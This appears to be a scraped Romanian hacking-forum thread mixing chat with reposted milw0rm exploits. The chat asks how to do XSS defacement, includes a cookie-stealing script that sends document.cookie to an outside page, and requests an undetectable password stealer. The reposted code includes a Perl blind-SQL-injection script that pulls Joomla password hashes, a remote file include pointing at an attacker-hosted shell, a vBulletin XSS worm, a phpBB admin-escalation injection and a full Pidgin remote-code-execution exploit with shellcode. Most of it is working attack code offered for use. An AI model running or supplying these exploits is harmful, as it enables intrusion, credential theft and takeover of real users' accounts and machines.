dRuNNNk

multumesc baieti am mai invatat inca ceva

am inteles dar eu am siteu asta serials.ws daca introduc codul innerHTMl nu pateste nimic

ma poate ajuta cineva la xss defacement nu pricep ce trebuie sa fac. Cum pot face xss defacement fara sa ii dau adminului <script>document.location="http://siteulmeu.com/cookiestealer.php?cookie=" +document.cookies</script> se poate altfel?>

) aHAha v-ati batut pana la urma ?

cateva indicii ? base64 hex to string ? rot13? da cateva indicii

am schimbat-o :)P

facem blogroll?

My blog Blogul lu' dRuNNNk Enjoy App fac blogroll si banner exchange care doreste add me drunnnkzor.0day

da de ce ai sa ne dai tu? XD

salut si bine ai venit pe resete

Download : Download

Are careva vreun fud stealer mozilla bun?

)) de unde a mai venit si yulik asta ma

ce prost

#######################[In The Name Of Allah]########################## #ProdLer <= 2.0 Remote File Include Vulnerability #Download Script : http://sourceforge.net/projects/prodler/files/ #Author : cr4wl3r #Contact : cr4wl3r[4t]linuxmail[dot]org #Location : Gorontalo - INDONESIA #Blog : http://sh3ll4u.blogspot.com #Dork : No DoRk f0R ScRipT KiDDieS ######################################################################## #file : # prodler.class.php # line 4 require_once $sPath.'include/variable.class.php'; ######################################################################## #3xplo!t : #http://target.com/[path]/include/prodler.class.php?sPath=http://attacker.com/shell.txt??? ######################################################################## #Greetz : MyMom [alm] #Special Thanks : str0ke, All MusLim HacKers #Thanks 2 : opt!x hacker, xoron, irvian, cyberlog, EA ngel, bl4ck_3ng1n3, Hmei7, zvtral, s4va, # mywisdom, wendys, cyberpeace, agenr@t, basix, nTc, angky.tatoki, funky_sensey, exnome, # aRiee, Romy.Chairul, Mr.C, Mr.Crossbeam, noQen, CyberSufi, untouch, g4pt3k, chawanua, # d3vilnet, donyskaynet, panteto, MaRloN, Dew0 ######################################################################## # F0r All MusLim In tHe W0rlD : # SelaMat IduL FitRi 1 SyaWaL 1430H # Takabbalallah Huminnawaminkum Minalaidin Walfaizin ######################################################################## #Note : No fuCk, JusT PeaCe ######################################################################## #sekuritionline.net (all crew sekuritionline) #manadocoding.net (all crew manadocoding) ###########################[VIVA ISLAM]################################# # milw0rm.com [2009-09-21]

scuze nu m-am uitat ca ai scris si tu

l-am mai vazut pe rst oricum e facut de sirgod

--------------------------------------------------------------------------------- joomla component com_jinc (newsid) Blind SQL Injection Vulnerability --------------------------------------------------------------------------------- Author : Chip D3 Bi0s Group : LatiHackTeam Email : chipdebios[alt+64]gmail.com Date : 21 September 2009 Critical Lvl : Moderate Impact : Exposure of sensitive information Where : From Remote --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : JINC (Joomla! Integrated Newsletters Component) version : 0.2 Developer : lhacky License : GPL type : Non-Commercial Date Added : 2 September 2009 Demo : http://www.lhacky.org/jextensions/index.php?option=com_content&view=article&id=18:how-to-use&catid=12:jinc-documentation&Itemid=28 Download : http://www.lhacky.org/jextensions/index.php?option=com_content&view=article&id=3&Itemid=15 Description : JINC (Joomla! Integrated Newsletters Component) is a easy-to-use and administer newsletter component for Joomla!. Using JINC your website users can auto-subscribe and unsubscribe to newsletters you defined. JINC includes classical newsletter functionalities * Newsletter, messages and subscription management. * TAG substitution inside the messages body. * User auto-registration with welcome message at subscription time. * Newsletter Disclaimer. * HTML and Text Plain messages. * Massive or personalized messages. * Reports on message sending. * Subscription creating user "on the fly". * Message preview to message creator before sending to the newsletter subscribers --------------------------------------------------------------------------- I.Blind SQL injection (newsid) Poc/Exploit: ~~~~~~~~~ http://127.0.0.1/[path]/index.php?option=com_jinc&view=messages&newsid=1[blind] To make, you must be registered +++++++++++++++++++++++++++++++++++++++ [!] Produced in South America +++++++++++++++++++++++++++++++++++++++ # milw0rm.com [2009-09-21]

#!/usr/bin/perl -w #--------------------------------------------------------------------------------- #joomla component com_mytube (user_id) Blind SQL Injection Vulnerability #--------------------------------------------------------------------------------- #Author : Chip D3 Bi0s #Group : LatiHackTeam #Email : chipdebios[alt+64]gmail.com #Date : 15 September 2009 #Critical Lvl : Moderate #Impact : Exposure of sensitive information #Where : From Remote #--------------------------------------------------------------------------- #Affected software description: #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #Application : MyRemote Video Gallery #version : 1.0 Beta #Developer : Jomtube Team #License : GPL type : Non-Commercial #Date Added : Aug 24, 2009 #Download : http://joomlacode.org/gf/download/frsrelease/10834/42943/com_mytube_1.0.0_2009.08.02.zip #Description : #MyRemote Video Gallery is the most Powerful Video Extension made for Joomla 1.5x #which will allow you to transform your Website into a professional looking Video #Gallery with functionality that is similar to YouTube.com. MyRemote Video Gallery #is an open source (GNU GPL) video sharing Joomla extension has been created #specifically for the Joomla 1.5x (MVC) Framework and can not be used without Joomla. #MyRemote Video Gallery gives you the option to Embed Videos from Youtube and offers #the Framework so you can create your own Remote Plugins for other Remote Servers like #Dailymotion, Google Video, Vimeo, Blip.tv, Clipser, Revver, a which will allow you to #run your site for low cost since all the bandwidth usage and hard drive space is located #on the video server sites. So if you already have a large library of Videos on some #Remote Sites like Youtube.com you can build the Video Part of your Site Very Quickly. #--------------------------------------------------------------------------- #I.Blind SQL injection (user_id) #Poc/Exploit: #~~~~~~~~~~~ #http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=X[blind]&option=com_mytube&Itemid=null #X: Valid User_id #+++++++++++++++++++++++++++++++++++++++ #[!] Produced in South America #+++++++++++++++++++++++++++++++++++++++ use LWP::UserAgent; use Benchmark; my $t1 = new Benchmark; system ('cls'); print "\n\n"; print "\t\t[+] ---------------------------------[+]\n"; print "\t\t| | Chip d3 Bi0s | |\n"; print "\t\t| MyRemote Video Gallery Bsql | \n"; print "\t\t|joomla component com_mytube (user_id)| \n"; print "\t\t[+]----------------------------------[+]\n\n"; print "http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=62:\n";chomp(my $target=<STDIN>); $w="Total Videos In Category"; $column_name="concat(password)"; $table_name="jos_users"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); print "----------------Inyectando----------------\n"; $host = $target . "+and+1=1&option=com_mytube&Itemid=null"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; if ($content =~ /$regexp/) { $host = $target . "+and+1=2&option=com_mytube&Itemid=null"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; if ($content =~ /$regexp/) {print " [-] Exploit Fallo \n";} else {print " [-] Vulnerable \n"; $d=0; for ($idusuario=62;$idusuario<=80;$idusuario++) { $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$idusuario."+limit+0,1),1,1))>0&option=com_mytube&Itemid=null"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; if ($content =~ /$regexp/) {$idusu[$d]=$idusuario;$d=$d+1} } print " [+] Usuario existentes : "." ".join(',', @idusu) . "\n"; print " [-] # Usuario que desea extraer : ";chomp($iduss=<STDIN>); for ($x=1;$x<=32;$x++) { $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))>57&option=com_mytube&Itemid=null"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; print " [!] ";if($x <= 9 ) {print "0$x";}else{print $x;} if ($content =~ /$regexp/) { for ($c=97;$c<=102;$c++) { $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))=".$c."&option=com_mytube&Itemid=null"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=102;} } } else { for ($c=48;$c<=57;$c++) { $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))=".$c."&option=com_mytube&Itemid=null"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=57;} } } } print " [+] Password :"." ".join('', @caracter) . "\n"; my $t2 = new Benchmark; my $tt = timediff($t2, $t1); print "El script tomo:",timestr($tt),"\n"; } } else {print " [-] Exploit Fallo \n";} # milw0rm.com [2009-09-21]

/* ----------------------------- * Author = Mx * Title = vBulletin 3.7.3 Visitor Messages XSS/XSRF + worm * Software = vBulletin * Addon = Visitor Messages * Version = 3.7.3 * Attack = XSS/XSRF - Description = A critical vulnerability exists in the new vBulletin 3.7.3 software which comes included + with the visitor messages addon (a clone of a social network wall/comment area). - When posting XSS, the data is run through htmlentities(); before being displayed + to the general public/forum members. However, when posting a new message, - a new notification is sent to the commentee. The commenter posts a XSS vector such as + <script src="http://evilsite.com/nbd.js">, and when the commentee visits usercp.php - under the domain, they are hit with an unfiltered xss attach. XSRF is also readily available + and I have included an example worm that makes the user post a new thread with your own - specified subject and message. * Enjoy. Greets to Zain, Ytcracker, and http://digitalgangster.com which was the first subject * of the attack method. * ----------------------------- */ function getNewHttpObject() { var objType = false; try { objType = new ActiveXObject('Msxml2.XMLHTTP'); } catch(e) { try { objType = new ActiveXObject('Microsoft.XMLHTTP'); } catch(e) { objType = new XMLHttpRequest(); } } return objType; } function getAXAH(url){ var theHttpRequest = getNewHttpObject(); theHttpRequest.onreadystatechange = function() {processAXAH();}; theHttpRequest.open("GET", url); theHttpRequest.send(false); function processAXAH(){ if (theHttpRequest.readyState == 4) { if (theHttpRequest.status == 200) { var str = theHttpRequest.responseText; var secloc = str.indexOf('var SECURITYTOKEN = "'); var sectok = str.substring(21+secloc,secloc+51+21); var posloc = str.indexOf('posthash" value="'); var postok = str.substring(17+posloc,posloc+32+17); var subject = 'subject text'; var message = 'message text'; postAXAH('http://digitalgangster.com/4um/newthread.php?do=postthread&f=5', 'subject=' + subject + '&message=' + message + '&wysiwyg=0&taglist=&iconid=0&s=&securitytoken=' + sectok + '&f=5&do=postthread&posthash=' + postok + 'poststarttime=1&loggedinuser=1&sbutton=Submit+New+Thread&signature=1&parseurl=1&emailupdate=0&polloptions=4'); } } } } function postAXAH(url, params) { var theHttpRequest = getNewHttpObject(); theHttpRequest.onreadystatechange = function() {processAXAHr(elementContainer);}; theHttpRequest.open("POST", url); theHttpRequest.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=iso-8859-2'); theHttpRequest.send(params); function processAXAHr(elementContainer){ if (theHttpRequest.readyState == 4) { if (theHttpRequest.status == 200) { } } } } getAXAH('http://digitalgangster.com/4um/newthread.php?do=newthread&f=5'); document.write('<iframe src="http://digitalgangster.com/4um/newthread.php?do=newthread&f=5">'); # milw0rm.com [2008-11-20]

########################################################################## # # phpBB3 addon prime_quick_style GetAdmin Exploit # # Vulnerability found and exploited by -SmoG- # # target file: prime_quick_style.php # # # vuln: POST parameter "prime_quick_style" is injectable. # source: http://www.phpbb.com/community/viewtopic.php?f=70&t=692625 # # HowTo: after login, go to "./ucp.php" and manipulate the content from the "prime_quick_style"-parameter. # example: prime_quick_style = "5,user_type = 3, user_permissions = ''" # # query will be look like this: "UPDATE USER_TABLE SET user_style = ANY_STYLE(integer), user_type = 3, user_permissions = '' WHERE user_id = YourId" # # gratz, now u will be an admin # # --- greetz to Pronoobz.org --- AbiDez, ChinaSun and ~dp~ || Thanks you a lot! --- # # # -( by -SmoG- )- ########################################################################## # milw0rm.com [2009-09-01] milw0rm.com

salutare si bine ai venit

mai bine putini si buni decat multi si prosti

/* * Pidgin MSN <= 2.5.8 Remote Code Execution * * Pierre Nogues - pierz@hotmail.it * http://www.indahax.com/ * * * Description: * Pidgin is a multi-protocol Instant Messenger. * * This is an exploit for the vulnerability[1] discovered in Pidgin by core-security[2]. * The library "libmsn" used by pidgin doesn't handle specially crafted MsnSlp packets * which could lead to memory corruption. * * Affected versions : * Pidgin <= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library. * * Plateforms : * Windows, Linux, Mac * * Fix : * Fixed in Pidgin 2.5.9 * Update to the latest version : http://www.pidgin.im/download/ * * References : * [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694 * [2] http://www.coresecurity.com/content/libpurple-arbitrary-write * [3] http://www.pidgin.im/news/security/?id=34 * * Usage : * You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/ * javac.exe -cp "%classpath%;.\jml-1.0b3-full.jar" PidginExploit.java * java -cp "%classpath%;.\jml-1.0b3-full.jar" PdiginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL * */ import net.sf.jml.*; import net.sf.jml.event.*; import net.sf.jml.impl.*; import net.sf.jml.message.p2p.*; import net.sf.jml.util.*; public class PidginExploit { private MsnMessenger messenger; private String login; private String password; private String target; private int session_id = NumberUtils.getIntRandom(); private byte shellcode[] = new byte[] { /* * if you use the stack in your shellcode do not forgot to change esp because eip == esp == kaboom ! * sub esp,500 */ (byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00, /* * windows/exec - 121 bytes * http://www.metasploit.com * EXITFUNC=process, CMD=calc.exe */ (byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45, (byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b, (byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49, (byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99, (byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d, (byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04, (byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66, (byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb, (byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24, (byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64, (byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70, (byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83, (byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73, (byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7, (byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65, (byte) 0x00 }; // reteip = pointer to the return address in the stack // The shellcode will be wrote just before reteip // and reteip will automaticly point to the shellcode. It's magic ! private int reteip = 0x0022CFCC; //stack on XP SP3-FR Pidgin 2.5.8 private int neweip; private byte[] payload = new byte[shellcode.length + 4]; private int totallength = reteip + 4; public static void main(String[] args) throws Exception { if(args.length != 3){ System.out.println("PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL"); }else{ PidginExploit exploit = new PidginExploit(args[0],args[1],args[2]); exploit.start(); } } public PidginExploit(String login, String password, String target){ this.login = login; this.password = password; this.target = target; neweip = reteip - shellcode.length ; for(int i=0;i<shellcode.length;i++) payload[i] = shellcode[i]; payload[shellcode.length] = (byte)(neweip & 0x000000FF); payload[shellcode.length + 1] = (byte)((neweip & 0x0000FF00) >> 8); payload[shellcode.length + 2] = (byte)((neweip & 0x00FF0000) >> 16); payload[shellcode.length + 3] = (byte)((neweip & 0xFF000000) >> 24); } public void start() { messenger = MsnMessengerFactory.createMsnMessenger(login,password); messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE); messenger.setLogIncoming(false); messenger.setLogOutgoing(false); initMessenger(messenger); messenger.login(); } protected void initMessenger(MsnMessenger messenger) { messenger.addContactListListener(new MsnContactListAdapter() { public void contactListInitCompleted(MsnMessenger messenger) { final Object id = new Object(); messenger.addSwitchboardListener(new MsnSwitchboardAdapter() { public void switchboardStarted(MsnSwitchboard switchboard) { if (id != switchboard.getAttachment()) return; switchboard.inviteContact(Email.parseStr(target)); } public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) { if (id != switchboard.getAttachment()) return; MsnP2PSlpMessage msg = new MsnP2PSlpMessage(); msg.setIdentifier(NumberUtils.getIntRandom()); msg.setSessionId(session_id); msg.setOffset(0); msg.setTotalLength(totallength); msg.setCurrentLength(totallength); // This flag create a bogus MsnSlpPacket in pidgin memory with a buffer pointing to null // We'll use this buffer to rewrite memory in the stack msg.setFlag(0x1000020); msg.setP2PDest(target); switchboard.sendMessage(msg); System.out.println("First packet sent, waiting for the ACK"); } public void switchboardClosed(MsnSwitchboard switchboard) { System.out.println("switchboardClosed"); switchboard.getMessenger().removeSwitchboardListener(this); } public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){ System.out.println("contactLeaveSwitchboard"); } }); messenger.newSwitchboard(id); } }); messenger.addMessageListener(new MsnMessageAdapter(){ public void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) { //We receive the ACK of our first packet with the ID of the new bogus packet message.getIdentifier(); MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip, payload.length, payload, target); switchboard.sendMessage(msg); System.out.println("ACK received && Payload sent !"); System.out.println("Exploit OK ! CTRL+C to quit"); } }); messenger.addMessengerListener(new MsnMessengerAdapter() { public void loginCompleted(MsnMessenger messenger) { System.out.println(messenger.getOwner().getEmail() + " login"); } public void logout(MsnMessenger messenger) { System.out.println(messenger.getOwner().getEmail() + " logout"); } public void exceptionCaught(MsnMessenger messenger, Throwable throwable) { System.out.println("caught exception: " + throwable); } }); } } // milw0rm.com [2009-09-09] Sursa Milw0rm.com

salutare si bine ai venit sper ca le recomanzi si prietenilor tai forumul nostur nu?